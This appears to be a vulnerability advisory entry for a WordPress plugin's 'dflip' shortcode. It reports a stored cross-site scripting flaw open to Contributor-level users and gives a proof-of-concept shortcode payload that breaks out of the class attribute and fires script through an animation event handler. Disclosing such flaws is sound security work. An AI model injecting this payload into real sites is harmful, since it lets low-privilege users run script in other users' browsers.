The plugin does not escape the class attribute of its shortcode before outputting it back in an attribute, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks
[dflip class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//']
apple502j
apple502j
Yes
2021-09-15 (about 1 years ago)
2021-09-15 (about 1 years ago)
2022-04-08 (about 9 months ago)